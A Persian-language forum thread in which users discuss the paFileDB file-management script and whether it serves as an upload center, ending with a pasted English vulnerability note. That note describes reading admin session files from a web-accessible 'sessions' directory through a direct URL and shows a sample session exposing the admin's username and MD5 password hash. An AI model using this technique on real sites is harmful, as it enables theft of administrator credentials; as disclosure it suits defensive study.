آقا سالار شما كه خودتون يدونه معرفي كرده بوديدsalar گفت:اون چندتا رو آپلود کن نیاز دارم![]()
amir_s گفت:آقا سالار شما كه خودتون يدونه معرفي كرده بوديدsalar گفت:اون چندتا رو آپلود کن نیاز دارم![]()
Delphiran گفت:http://pafiledb.delphishop.com/demo
:ديsalar گفت:Delphiran گفت:http://pafiledb.delphishop.com/demo
آپلود سنتر نه دانلود سنتر :roll:
salar گفت:Delphiran گفت:http://pafiledb.delphishop.com/demo
آپلود سنتر نه دانلود سنتر :roll:
Delphiran گفت:salar گفت:Delphiran گفت:http://pafiledb.delphishop.com/demo
آپلود سنتر نه دانلود سنتر :roll:
paFileDB هم امکان آپلود داره، و هم دانلود.
در ضمن، چنین سیستمی تا یک Upload Center نباشه نمیتونه Download Center باشه.
Delphiran گفت:salar گفت:Delphiran گفت:http://pafiledb.delphishop.com/demo
آپلود سنتر نه دانلود سنتر :roll:
paFileDB هم امکان آپلود داره، و هم دانلود.
در ضمن، چنین سیستمی تا یک Upload Center نباشه نمیتونه Download Center باشه.
Scenario :
* admin (dudul) log in to manage the site at
http://URL/pafiledb/pafiledb.php?action=admin ,then the session is recorded in
sessions directory
+ attacker access the directory directly and see the "sessions" (in a same time)
Exploit: http://URL/pafiledb/sessions/[sessionfile]
then access the listing sessions file
example : 'sess_12c9d926184e836451a15ed837bb875d'
which is contain
user|s:5:"dudul";pass|s:32:"810f9f3fbad17446a22ed2e516a12c36";
ip|s:32:"f528764d624db129b32c21fbca0cb8d6";
---- info that attacker get ----
user : dudul
pass : 810f9f3fbad17446a22ed2e516a12c36 <-- MD5